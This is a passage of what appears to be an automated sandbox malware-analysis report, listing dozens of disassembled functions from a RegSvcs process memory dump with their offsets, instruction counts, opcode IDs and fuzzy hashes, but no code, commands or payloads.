                                                                          • Instruction Fuzzy Hash: 2D517C72504612AFDB21DE68C884E6BBBE8FBC5750F014929FA54DF250E670ED05CBA3
                                                                          Function 01588350 Relevance: .2, Instructions: 161COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2340505383.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_14b0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: f20c1d56f8ffe461e79cfcf8111df674f2c962c45869c8037bccb6afd99befa2
                                                                          • Instruction ID: 12eb1bc6becca4709a7c9d5f4f809f9f0fca159b8816b2a2f30e3e94f30d18a7
                                                                          • Opcode Fuzzy Hash: f20c1d56f8ffe461e79cfcf8111df674f2c962c45869c8037bccb6afd99befa2
                                                                          • Instruction Fuzzy Hash: 4051DF71900706EFD721EF5AC880A6BFBF9FF94714F504A1ED2926B6A1C7B0A941CB50
                                                                          Function 0151E443 Relevance: .2, Instructions: 158COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2340505383.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_14b0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 3bd02b3685da58bdeebd1e01d729cfa518eef7b5096fc717dd62d7ddae6b55d8
                                                                          • Instruction ID: 0f97075526c113fac1a62cd02f9747b700ea0646abf80d681c5dc811f6d5c73a
                                                                          • Opcode Fuzzy Hash: 3bd02b3685da58bdeebd1e01d729cfa518eef7b5096fc717dd62d7ddae6b55d8
                                                                          • Instruction Fuzzy Hash: 8C517F72200A56DFDB22DF69C990F6AB3F9FF54744F41042EEA429B660D734E940CB51
                                                                          Function 01584180 Relevance: .2, Instructions: 156COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2340505383.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_14b0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: abe439279250889d5f4aa232798a6515b1a7eefa5d2a39f547639a5b799125be
                                                                          • Instruction ID: cc242c9a14e51b25cd9fccefcf2db3308858578651f518c71838271e38f87ac1
                                                                          • Opcode Fuzzy Hash: abe439279250889d5f4aa232798a6515b1a7eefa5d2a39f547639a5b799125be
                                                                          • Instruction Fuzzy Hash: 8D517B716083429FD754EF29C880A6FBBE5BFD8204F44492DF999EB250EB30D945CB52
                                                                          Function 015045B1 Relevance: .2, Instructions: 156COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2340505383.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_14b0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 0d00e1a585e90d849ff2aa0c284c489e35fe4af6d50ef2092e2439a8439fa3dd
                                                                          • Instruction ID: d8206a4ea040826f535c2f2f8e6bbdfb817879128163262117aaa94f203e7ce8
                                                                          • Opcode Fuzzy Hash: 0d00e1a585e90d849ff2aa0c284c489e35fe4af6d50ef2092e2439a8439fa3dd
                                                                          • Instruction Fuzzy Hash: 85515E71E0021AABDF16DF98C440BEEBBB9BF85754F044169EA01AF290E774D945CBA0
                                                                          Function 0156E9E0 Relevance: .2, Instructions: 154COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2340505383.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_14b0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: b631fe1f52208cb18c131e5291272d5615ec6cd8030edbb8dd5fe07777775a1e
                                                                          • Instruction ID: 28e9ba33b35569d991ecc704251d7c726aaaa9a361a349a118db15e5a844af43
                                                                          • Opcode Fuzzy Hash: b631fe1f52208cb18c131e5291272d5615ec6cd8030edbb8dd5fe07777775a1e
                                                                          • Instruction Fuzzy Hash: 2951C539D0121AEFDF21DE94C886BAEBBBDFB41324F144625D5116F1A0D7709D418BE0
                                                                          Function 015A8B28 Relevance: .2, Instructions: 152COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2340505383.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_14b0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 86912d77406009c630d86e90380ebdccb62ef22b54dd2c4eb464bbea059ebf3e
                                                                          • Instruction ID: 0936cc8f7cecb99e3c07b7318d193d5b04fff739623d6c219c5861916af4f435
                                                                          • Opcode Fuzzy Hash: 86912d77406009c630d86e90380ebdccb62ef22b54dd2c4eb464bbea059ebf3e
                                                                          • Instruction Fuzzy Hash: 4D41F6707816169BE729DB2DC894B7FBBDAFFD0621F888619E9158F280DB30D801C791
                                                                          Function 0156CBF0 Relevance: .1, Instructions: 148COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2340505383.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_14b0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 9694bc082daa1bfa977dcc17f5351ae0044ae071994473baecf1c2cfdbff4f91
                                                                          • Instruction ID: d75a33c8fbed457cac52af8d8d840309510c15f8f73175e03e02ea8a7d88aabc
                                                                          • Opcode Fuzzy Hash: 9694bc082daa1bfa977dcc17f5351ae0044ae071994473baecf1c2cfdbff4f91
                                                                          • Instruction Fuzzy Hash: 0B519C76A0021ADFDB20DFA9C88099EBBF9FF58318B51451AD696AB304D734ED41CBD0
                                                                          Function 0151A430 Relevance: .1, Instructions: 139COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2340505383.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_14b0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 130b2207a600d1680bd3f0978cf053e2bb8f48740f888335f7f3d2c747c32e2e
                                                                          • Instruction ID: e0af86bc18704468ce4553e2e1c96cf4c15cf8564f5b58d267ed1682a7f18864
                                                                          • Opcode Fuzzy Hash: 130b2207a600d1680bd3f0978cf053e2bb8f48740f888335f7f3d2c747c32e2e
                                                                          • Instruction Fuzzy Hash: E84117716422429BEF37EF69D891F6E37A5BB65708F42042DEE029F245D7B1D804C760
                                                                          Function 015AA9D3 Relevance: .1, Instructions: 139COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2340505383.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_14b0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 7622aca86cac28a0acf118705f69cf0cc3cb486fddc0e93dd45dfd5b9ea80ff7
                                                                          • Instruction ID: e8c4d6d3504a53c6ee82ee1fec9ecae64671a2bbd654e4295cc906312d36102b
                                                                          • Opcode Fuzzy Hash: 7622aca86cac28a0acf118705f69cf0cc3cb486fddc0e93dd45dfd5b9ea80ff7
                                                                          • Instruction Fuzzy Hash: F641E6716407169FD725CF68C994A6EB7E9FF80210B45462EEA128F740EB70ED08C790
                                                                          Function 015101F8 Relevance: .1, Instructions: 138COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2340505383.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_14b0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 3f9fec2264bfb8c6fc547b2046ed8be618e90fc71d6fe614b59976f769de0db4
                                                                          • Instruction ID: fb4298affcfc16dd5b5c34c501067bc9684a6a21f3ffa29ba54938fc49ac50d1
                                                                          • Opcode Fuzzy Hash: 3f9fec2264bfb8c6fc547b2046ed8be618e90fc71d6fe614b59976f769de0db4
                                                                          • Instruction Fuzzy Hash: 2741BF36900216DBEB12DF98C440AEEB7B4BF88710F15815AF915FF294D7349D81CBA4
                                                                          Function 0150EBFC Relevance: .1, Instructions: 138COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2340505383.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_14b0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 72078d781e6273ebcd44493bd994f1f52438b936ddbdb3b33a751073f7942c05
                                                                          • Instruction ID: 8773ec389c97c08c34fec9e2750c2c6ca7950ad1df141a6a74041f14463aa295
                                                                          • Opcode Fuzzy Hash: 72078d781e6273ebcd44493bd994f1f52438b936ddbdb3b33a751073f7942c05
                                                                          • Instruction Fuzzy Hash: FB41BF722043029FD726DF68C885A1AB7E9FB98218F144C2EE697CB351DB71E8498B50
                                                                          Function 01522750 Relevance: .1, Instructions: 137COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2340505383.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_14b0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: f9143dc9ab32c0c56755980999bbdd100a6c23c33ec6549c8632214e05dba9ed
                                                                          • Instruction ID: 540ea0765c49a176a0d49f80bce75746706b0e933fe1eee70c5fc7026081a822
                                                                          • Opcode Fuzzy Hash: f9143dc9ab32c0c56755980999bbdd100a6c23c33ec6549c8632214e05dba9ed
                                                                          • Instruction Fuzzy Hash: 57517C75A00215CFCB55CF98C490AADFBF2FF84714F2582AAD915AB355D730AE42CB90
                                                                          Function 014E6154 Relevance: .1, Instructions: 133COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2340505383.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_14b0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 10c9f17f4526b068e23089d160d961c496cbf6d3652f1d92558ce0da11a44f7e
                                                                          • Instruction ID: 4a40dc80e6b453a395b7335bf471b4e687e71507ecadd8c8bdc9fe44c9b61577
                                                                          • Opcode Fuzzy Hash: 10c9f17f4526b068e23089d160d961c496cbf6d3652f1d92558ce0da11a44f7e
                                                                          • Instruction Fuzzy Hash: 6251D670900256DBDB25DB68CC04BE9BBF1FF21315F1582AAD625AB3E1D7749982CF40
                                                                          Function 014E0BCD Relevance: .1, Instructions: 130COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2340505383.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_14b0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 3cb67c3fe6aeef55b02abf8c2e0fd546265cc7ab62fa29bfbc52514a17b1d59a
                                                                          • Instruction ID: 1f7cd78bf1fb93dc167338e60fde32f1d00cfa32c3faf9f0e7107cf735e5c957
                                                                          • Opcode Fuzzy Hash: 3cb67c3fe6aeef55b02abf8c2e0fd546265cc7ab62fa29bfbc52514a17b1d59a
                                                                          • Instruction Fuzzy Hash: F341AF32A002299ACB21DF68C949BEE77F4FF95740F0504AAE908AF251D774DE85CF91
                                                                          Function 014E0D59 Relevance: .1, Instructions: 130COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2340505383.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_14b0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: f1444fb510b2f35603c2205bb1dd3974f580ceaad0d492e6fe76d3bbde22f1c7
                                                                          • Instruction ID: d02561c2442d1b6aae417c7d593caeac44b95cec839e64e5e55d283a85c72dcf
                                                                          • Opcode Fuzzy Hash: f1444fb510b2f35603c2205bb1dd3974f580ceaad0d492e6fe76d3bbde22f1c7
                                                                          • Instruction Fuzzy Hash: B341C071B003199FEB319F29CC84F6ABBE9BB95610F0004ABF9459B291D7B0ED44CB52
                                                                          Function 015A866E Relevance: .1, Instructions: 129COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2340505383.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_14b0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 52a1741bb7668dbd0e330b4cee233e7836a49f18a3e4eafb0fad66dd8014cf6e
                                                                          • Instruction ID: 52fbebda1a65753e561c155327221bcc5722ff5cc05dfeab29d756afe3e4847a
                                                                          • Opcode Fuzzy Hash: 52a1741bb7668dbd0e330b4cee233e7836a49f18a3e4eafb0fad66dd8014cf6e
                                                                          • Instruction Fuzzy Hash: 7B41A475B40206ABEB15DF99CC84AAFBFBABF98701F644069E904AB351DA70DD01C760
                                                                          Function 014E0887 Relevance: .1, Instructions: 128COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2340505383.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_14b0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 02a6ea420b7f7a9720f271c00572e0c5eeb77c7aeccebf85599c7dae4741cb3a
                                                                          • Instruction ID: f39ff453b55f517405d7412380308e4c8a7c1cbcac706ae69c0ea782ba4152de
                                                                          • Opcode Fuzzy Hash: 02a6ea420b7f7a9720f271c00572e0c5eeb77c7aeccebf85599c7dae4741cb3a
                                                                          • Instruction Fuzzy Hash: 7F41AF717007069FE325CF29C484A26B7F9FB89315B104A6EE56687A60E7B0E846CB90
                                                                          Function 0150A470 Relevance: .1, Instructions: 127COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2340505383.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_14b0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: d0cf18a81684f0f467cab6e80de63690030b91e665a87dadb79f2b1347039673
                                                                          • Instruction ID: 998fe84ba398b4fdf926eeb9dff8852b869a5128916cf29bc849434ce6506cf3
                                                                          • Opcode Fuzzy Hash: d0cf18a81684f0f467cab6e80de63690030b91e665a87dadb79f2b1347039673
                                                                          • Instruction Fuzzy Hash: 3C419B32941306CFDF22DFA8D494BAD7BB0FB58214F060599D425AF3E1DB359904CBA0
                                                                          Function 014E8BF0 Relevance: .1, Instructions: 124COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2340505383.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_14b0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: b5ed44ddd6bd4cbed1a532fe01b51dc411cea94d1ffdef72ae6fcbee2baea2c1
                                                                          • Instruction ID: 9e538201d1321753ab6356692f4daafb7499dcd616ccbb4dbb889c224e65bee7
                                                                          • Opcode Fuzzy Hash: b5ed44ddd6bd4cbed1a532fe01b51dc411cea94d1ffdef72ae6fcbee2baea2c1
                                                                          • Instruction Fuzzy Hash: CE410232901203CBDB348F49D888A6ABBF2FBA5714F15816EE5219F765C335D842CF90
                                                                          Function 014D8918 Relevance: .1, Instructions: 123COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2340505383.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_14b0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: d133f1c88479ddd83a13c52f181f1790852bf9864b88ae976fe7f2983bcb0c15
                                                                          • Instruction ID: 24f93773f9b9ba6f5bc3c05bb9b2ea099b88ec9d370447dca2428074ccebde5b
                                                                          • Opcode Fuzzy Hash: d133f1c88479ddd83a13c52f181f1790852bf9864b88ae976fe7f2983bcb0c15
                                                                          • Instruction Fuzzy Hash: 23415A715083079ED712DF698850A6BB7E9FF84B54F41092BFA84DB260E730DE058BA3
                                                                          Function 014DA020 Relevance: .1, Instructions: 122COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2340505383.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_14b0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 165ca662f4b1c8196e57a2c4173bd848e06efaa623a98917432a96e6c9651090
                                                                          • Instruction ID: 99c68139a05dbf13907a0cb0c92aabf9a03ac63d273de081710a84752bb37de7
                                                                          • Opcode Fuzzy Hash: 165ca662f4b1c8196e57a2c4173bd848e06efaa623a98917432a96e6c9651090
                                                                          • Instruction Fuzzy Hash: FE412A71A00211DBDF22DE6984607BEBBB1FBD0754F25806BE9559F350D6328D80CB91
                                                                          Function 014E09AD Relevance: .1, Instructions: 122COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2340505383.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_14b0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 961cfbefccf7c995dee4fac8cd78e6e8e0860b260028bcea25dbf61381ceedf5
                                                                          • Instruction ID: aff571924ac6694aa8c4a42bc14b492eb10984679bc1a8c4157adf6c388ad037
                                                                          • Opcode Fuzzy Hash: 961cfbefccf7c995dee4fac8cd78e6e8e0860b260028bcea25dbf61381ceedf5
                                                                          • Instruction Fuzzy Hash: 15415771600605EFD721CF19C844B2ABBE4FF64315F248A6EE5598B361E7B0E9428B90
                                                                          Function 01510710 Relevance: .1, Instructions: 121COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2340505383.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_14b0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: cfe855aa5370e709d3beaf8d0a0824e85895befd2a0058a9eb758e5aacecaf96
                                                                          • Instruction ID: b8b6f3c0f7171617a93aad8cbbc3820b8be1eb4c5b3f9018f638b4b9a53d65b3
                                                                          • Opcode Fuzzy Hash: cfe855aa5370e709d3beaf8d0a0824e85895befd2a0058a9eb758e5aacecaf96
                                                                          • Instruction Fuzzy Hash: AD415B75A04705EFEB25CF99C980AAABBF4FF18700B10496DE556DB295D330EA84CF90
                                                                          Function 014E262C Relevance: .1, Instructions: 119COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2340505383.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_14b0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 88a5a90f318409ff1a632d1faac961a940848c922d341f4ab27e8ec3dd2ac8db
                                                                          • Instruction ID: 4cbc7c1620eceb05e81a67940e36a21d3a93c33900c0ce606b725a1ddbf6f3e8
                                                                          • Opcode Fuzzy Hash: 88a5a90f318409ff1a632d1faac961a940848c922d341f4ab27e8ec3dd2ac8db
                                                                          • Instruction Fuzzy Hash: 4A41CF71941705CFCB22EF29C804A59B7F5FF94312F1186AEC4169B2B1DBB09942CF51
                                                                          Function 0151C8F9 Relevance: .1, Instructions: 116COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2340505383.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_14b0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 1bab0e0a6cbf9af0b6293b4a9568a1ac74b77402d3b91c664ae61f5d64f17e22
                                                                          • Instruction ID: 97bf54433871a82a932119164e4c1e84e6d58f72aaed3b467ee417b35d95fe31
                                                                          • Opcode Fuzzy Hash: 1bab0e0a6cbf9af0b6293b4a9568a1ac74b77402d3b91c664ae61f5d64f17e22
                                                                          • Instruction Fuzzy Hash: 33317AB2A40246DFEB52CF68C040799BBF1FB49724F2085AED519EF251D376A902CB90
                                                                          Function 015607C3 Relevance: .1, Instructions: 114COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2340505383.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_14b0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: efed93f6479699b455cbbb19a4b844196c5f8ef4a705f094d78601ff62d58591
                                                                          • Instruction ID: 0c1e6475257faba73b594b5beae08776ba8f67b4cca26d488f63a6b791f69f2f
                                                                          • Opcode Fuzzy Hash: efed93f6479699b455cbbb19a4b844196c5f8ef4a705f094d78601ff62d58591
                                                                          • Instruction Fuzzy Hash: 2B418C725083029BD760DF29C844B9BBBE8FF88664F104A2EF598DB291D7709904CBD2
                                                                          Function 015605A7 Relevance: .1, Instructions: 111COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2340505383.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_14b0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 7a34f1b07ee02708bcb34c7f522a2bebf84de09e24e49b67adfc406b44f6c1e8
                                                                          • Instruction ID: 11401cf16164c3cfe355a75495cc2e07b3e0eaec67d3f9d3bc57dbbecd8ff733
                                                                          • Opcode Fuzzy Hash: 7a34f1b07ee02708bcb34c7f522a2bebf84de09e24e49b67adfc406b44f6c1e8
                                                                          • Instruction Fuzzy Hash: E641BD726046529BD320DF68C840A6AB7E9FFD8700F140A2DF9949B6D0E730ED05C7A6
                                                                          Function 014E4859 Relevance: .1, Instructions: 111COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2340505383.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_14b0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: bcdbbbde333e4f1dc88b2f2306119501b70f7b74186b9fc63e82d73e96c6bf1e
                                                                          • Instruction ID: 4bf88c796cb3796eac29dc5a2cc7c14f33c0bc9b984dedbfeb6a5804ac262eca
                                                                          • Opcode Fuzzy Hash: bcdbbbde333e4f1dc88b2f2306119501b70f7b74186b9fc63e82d73e96c6bf1e
                                                                          • Instruction Fuzzy Hash: 5941CD306003028BD725CF29D888B2ABBE9AF90366F19446EE651DB3A1DB70D805CB91
                                                                          Function 014F02E1 Relevance: .1, Instructions: 106COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2340505383.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_14b0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: d45b632d2c88e3b1d2b0a33d4d0818ae25320c4cce4feeb98528bfb7bef810ab
                                                                          • Instruction ID: 132aed2f9384f9bff81b9c3f31c1650a83e6bd715e469b37831457361165ea7f
                                                                          • Opcode Fuzzy Hash: d45b632d2c88e3b1d2b0a33d4d0818ae25320c4cce4feeb98528bfb7bef810ab
                                                                          • Instruction Fuzzy Hash: 3D31F531A04245ABDB218B69CC44B9BBFE9EF54350F04416BF855DB362C6749845CBA4
                                                                          Function 0158E3DB Relevance: .1, Instructions: 105COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2340505383.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_14b0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: f8dcb988de16dd72e440819ec4e21f5a77bc23e7f9196d7360cf37f9b27df34b
                                                                          • Instruction ID: 81aca152865dd4a7e171a473b54aac609d145d3dcbbfb85bef6e9f8e0c840844
                                                                          • Opcode Fuzzy Hash: f8dcb988de16dd72e440819ec4e21f5a77bc23e7f9196d7360cf37f9b27df34b
                                                                          • Instruction Fuzzy Hash: 5D316735740716ABE722AF998C51F6A7AB5FB59B50F010029F604BF3E1DAA5DD00C7A0
                                                                          Function 01594B4B Relevance: .1, Instructions: 104COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2340505383.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_14b0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 41fb0b891059fe340ca3620d96507c1338955fb1f6610a71d5553b492dfc7781
                                                                          • Instruction ID: 46ca74b4de3cadbd46695e53d26674d7ef1d8842fcf22dc5b6611c91f5c87f53
                                                                          • Opcode Fuzzy Hash: 41fb0b891059fe340ca3620d96507c1338955fb1f6610a71d5553b492dfc7781
